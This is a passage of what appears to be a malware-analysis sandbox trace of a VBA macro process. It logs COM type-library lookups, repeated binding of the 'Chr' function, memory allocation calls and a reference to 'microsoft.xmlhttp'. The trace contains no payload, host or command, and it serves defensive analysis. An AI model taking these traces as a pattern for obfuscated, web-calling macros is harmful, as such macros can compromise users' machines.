lpMultiByteStr=0x1d39d8f9cee, cbMultiByte=17, lpWideCharStr=0x1d3a3d029e2, cchWideChar=36 | out: lpWideCharStr="microsoft.xmlhttp") returned 17 [0060.434] IUnknown:AddRef (This=0x1d39d9d5068) returned 0x3 [0060.434] IUnknown:Release (This=0x1d39d9d5068) returned 0x2 [0060.434] IUnknown:QueryInterface (in: This=0x1d39d9d5068, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.434] IUnknown:QueryInterface (in: This=0x1d39d9d5068, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3984b937c, cbMultiByte=0, lpWideCharStr=0x1d3a3d02b9a, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0060.434] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d5068, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.434] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.434] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.434] IUnknown:Release (This=0x1d3980663b0) returned 0x9 [0060.434] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.434] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.434] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d5068, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.446] _mbscpy_s (in: _Dst=0x33e4fb4c60, _DstSizeInBytes=0x7, _Src=0x1d3a3172e12 | out: _Dst=0x33e4fb4c60) returned 0x0 [0060.446] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0060.446] strcpy_s (in: _Dst=0x33e4fb4760, _DstSize=0x4, _Src="Chr" | out: _Dst="Chr") returned 0x0 [0060.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb4760, cbMultiByte=4, lpWideCharStr=0x33e4fb45b0, cchWideChar=4 | out: lpWideCharStr="Chr") returned 4 [0060.446] IUnknown:AddRef (This=0x1d3980663b0) returned 0xa [0060.446] ITypeLib:RemoteIsName (in: This=0x1d3980663b0, szNameBuf="Chr", lHashVal=0x507e4b, pfName=0x33e4fb4680, pBstrLibName=0x33e4fb45b0 | out: pfName=0x33e4fb4680*=1, pBstrLibName=0x33e4fb45b0) returned 0x0 [0060.446] IUnknown:Release (This=0x1d3980663b0) returned 0x9 [0060.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Chr", cchWideChar=-1, lpMultiByteStr=0x33e4fb4760, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Chr", lpUsedDefaultChar=0x0) returned 4 [0060.446] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0060.446] IUnknown:Release (This=0x1d39d552b18) returned 0x6 [0060.446] IUnknown:Release (This=0x1d39d552b18) returned 0x5 [0060.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a32b2c26, cbMultiByte=4, lpWideCharStr=0x33e4fb46e0, cchWideChar=5 | out: lpWideCharStr="Chr") returned 4 [0060.446] ITypeComp:RemoteBind (in: This=0x1d39d552b20, szName="Chr", lHashVal=0x507e4b, wFlags=0x3, ppTInfo=0x33e4fb4698, pDescKind=0x33e4fb46ac, ppFuncDesc=0x33e4fb46b0, ppVarDesc=0x7ffd09599971, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb4698*=0x0, pDescKind=0x33e4fb46ac*=0, ppFuncDesc=0x33e4fb46b0, ppVarDesc=0x7ffd09599971, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172e3a, cbMultiByte=4, lpWideCharStr=0x33e4fb4840, cchWideChar=5 | out: lpWideCharStr="Chr") returned 4 [0060.446] ITypeComp:RemoteBind (in: This=0x1d3980663c0, szName="Chr", lHashVal=0x507e4b, wFlags=0x3, ppTInfo=0x33e4fb47f8, pDescKind=0x33e4fb480c, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb47f8*=0x0, pDescKind=0x33e4fb480c*=0, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172e3a, cbMultiByte=4, lpWideCharStr=0x33e4fb4840, cchWideChar=5 | out: lpWideCharStr="Chr") returned 4 [0060.447] ITypeComp:RemoteBind (in: This=0x1d3985c4c10, szName="Chr", lHashVal=0x507e4b, wFlags=0x3, ppTInfo=0x33e4fb47f8, pDescKind=0x33e4fb480c, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb47f8*=0x0, pDescKind=0x33e4fb480c*=0, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172e3a, cbMultiByte=4, lpWideCharStr=0x33e4fb4840, cchWideChar=5 | out: lpWideCharStr="Chr") returned 4 [0060.447] ITypeComp:RemoteBind (in: This=0x1d398065600, szName="Chr", lHashVal=0x507e4b, wFlags=0x3, ppTInfo=0x33e4fb47f8, pDescKind=0x33e4fb480c, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb47f8*=0x0, pDescKind=0x33e4fb480c*=0, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.447] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0060.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172e3a, cbMultiByte=4, lpWideCharStr=0x33e4fb4840, cchWideChar=5 | out: lpWideCharStr="Chr") returned 4 [0060.447] ITypeComp:RemoteBind (in: This=0x1d3985c5710, szName="Chr", lHashVal=0x507e4b, wFlags=0x3, ppTInfo=0x33e4fb47f8, pDescKind=0x33e4fb480c, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x7ffce09f40b8, ppTypeComp=0x1d300000000, pDummy=0x0 | out: ppTInfo=0x33e4fb47f8*=0x0, pDescKind=0x33e4fb480c*=0, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x7ffce09f40b8, ppTypeComp=0x1d300000000, pDummy=0x0) returned 0x0 [0060.447] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.447] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.447] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.447] strcpy_s (in: _Dst=0x33e4fb4950, _DstSize=0xb, _Src="_B_var_Chr" | out: _Dst="_B_var_Chr") returned 0x0 [0060.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb4950, cbMultiByte=11, lpWideCharStr=0x33e4fb47a0, cchWideChar=11 | out: lpWideCharStr="_B_var_Chr") returned 11 [0060.447] IUnknown:AddRef (This=0x1d3980663b0) returned 0xa [0060.447] ITypeLib:RemoteIsName (in: This=0x1d3980663b0, szNameBuf="_B_var_Chr", lHashVal=0x503b5c, pfName=0x33e4fb4870, pBstrLibName=0x33e4fb47a0 | out: pfName=0x33e4fb4870*=1, pBstrLibName=0x33e4fb47a0) returned 0x0 [0060.447] IUnknown:Release (This=0x1d3980663b0) returned 0x9 [0060.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_B_var_Chr", cchWideChar=-1, lpMultiByteStr=0x33e4fb4950, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_B_var_Chr", lpUsedDefaultChar=0x0) returned 11 [0060.447] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.447] IUnknown:AddRef (This=0x1d3980663b0) returned 0xa [0060.447] IUnknown:Release (This=0x1d3980663b0) returned 0x9 [0060.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172f7e, cbMultiByte=11, lpWideCharStr=0x33e4fb4800, cchWideChar=12 | out: lpWideCharStr="_B_var_Chr") returned 11 [0060.447] ITypeComp:RemoteBind (in: This=0x1d3980663c0, szName="_B_var_Chr", lHashVal=0x503b5c, wFlags=0x3, ppTInfo=0x33e4fb47b8, pDescKind=0x33e4fb47cc, ppFuncDesc=0x33e4fb47d0, ppVarDesc=0x0, ppTypeComp=0x3300000000, pDummy=0x0 | out: ppTInfo=0x33e4fb47b8*=0x1d39d9d55e8, pDescKind=0x33e4fb47cc*=1, ppFuncDesc=0x33e4fb47d0, ppVarDesc=0x0, ppTypeComp=0x3300000000, pDummy=0x0) returned 0x0 [0060.447] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d9d55e8, ppTypeAttr=0x33e4fb47c0, pDummy=0x1d39d966040 | out: ppTypeAttr=0x33e4fb47c0, pDummy=0x1d39d966040*=0x9d960000) returned 0x0 [0060.447] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d9d55e8) returned 0x0 [0060.447] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d3984b9280, cb=0x800) returned 0x1d398636ff0 [0060.448] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb4620 | out: ppvObject=0x33e4fb4620*=0x1d39d9d55e8) returned 0x0 [0060.448] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, pFuncIndex=0x33e4fb4660 | out: pFuncIndex=0x33e4fb4660*=0x2) returned 0x0 [0060.448] ITypeInfo2:GetFuncCustData (in: This=0x1d39d9d55e8, index=0x2, GUID=0x7ffce0bd6f38*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x33e4fb4678 | out: pVarVal=0x33e4fb4678*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3300000002, varVal2=0x503b5c)) returned 0x0 [0060.448] IUnknown:Release (This=0x1d39d9d55e8) returned 0x1 [0060.448] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x2 [0060.448] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d9d55e8) returned 0x0 [0060.448] IUnknown:Release (This=0x1d39d9d55e8) returned 0x1 [0060.448] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4878 | out: ppvObject=0x33e4fb4878*=0x0) returned 0x80004002 [0060.448] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x2 [0060.448] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.448] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.448] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.448] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.448] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.448] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.448] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.448] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.448] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.448] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.448] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.448] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x26d) returned 0x1d39808b080 [0060.449] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.449] IMalloc:GetSize (This=0x7ffd098ff3f0, pv=0x1d39808b080) returned 0x26d [0060.449] GetCurrentProcess () returned 0xffffffffffffffff [0060.449] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39808b080, dwSize=0x43) returned 1 [0060.449] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39808b080) [0060.449] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x230) returned 0x1d39dbc5db0 [0060.449] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.449] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.449] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.449] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.449] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.449] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.449] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.449] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.449] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.449] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.449] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.449] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.449] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.449] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.449] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.449] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.449] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.449] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.450] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.450] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.450] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.450] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.450] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.450] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.450] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.450] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.450] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.450] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.450] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.450] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.450] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.450] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.450] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.450] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.450] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3d10000 [0060.451] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.451] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.451] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.451] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.451] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.451] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.451] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.451] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.451] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.451] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.451] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.452] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.452] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.452] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.452] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.452] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.452] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.452] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.452] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.452] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.452] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.452] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.452] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.452] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.452] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.452] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, 